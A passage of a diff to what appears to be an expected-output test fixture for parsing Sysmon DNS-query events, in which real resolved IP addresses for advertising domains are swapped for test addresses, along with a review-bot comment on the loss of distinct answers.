03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5400,7 +5400,7 @@ "ProcessId": "2736", "QueryName": "appnexus-partners.tremorhub.com", "QueryStatus": "0", - "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", 
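Review bot: The eight distinct ELB answers in `QueryResults` on the new side are all replaced by the single address `89.160.20.156`, so the record now describes one address repeated eight times rather than eight different resolutions. That is harmless for `winlog.event_data.QueryResults` itself, but any array the pipeline derives from it (e.g. `dns.resolved_ip` or `related.ip`, which are not in this hunk) will collapse to one element if the pipeline de-duplicates, and the fixture then no longer exercises multi-answer parsing. Consider spreading the answers over several distinct addresses from the allowed test set instead of one repeated value. Since this is an expected-output fixture, the substitution belongs in the pipeline test input log with the expected file regenerated afterwards; the enclosing JSON object starts and ends outside this hunk.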
@@ -5430,7 +5430,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5449,7 +5449,7 @@ "event_data": { "QueryName": "x.dlx.addthis.com", "QueryStatus": "0", - "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.531", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5472,7 +5472,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5489,7 +5489,7 @@ "ProcessId": "2736", "QueryName": "dh.serving-sys.com", "QueryStatus": "0", - "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.532", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -5511,7 +5511,7 @@ { "@timestamp": "2021-05-05T15:30:51.707Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5523,7 +5523,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;", + "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.534", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5575,7 +5575,7 @@ "event_data": { "QueryName": "tags.rd.linksynergy.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.601", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5586,7 +5586,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -5600,7 +5600,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -5609,7 +5609,7 @@ "ProcessId": "2736", "QueryName": "rtb-csync.smartadserver.com", "QueryStatus": "0", - "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.604" }, @@ -5638,7 +5638,7 @@ "@timestamp": "2021-05-05T15:30:51.707Z", "winlog": { "event_data": { - "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.621", "ProcessGuid": 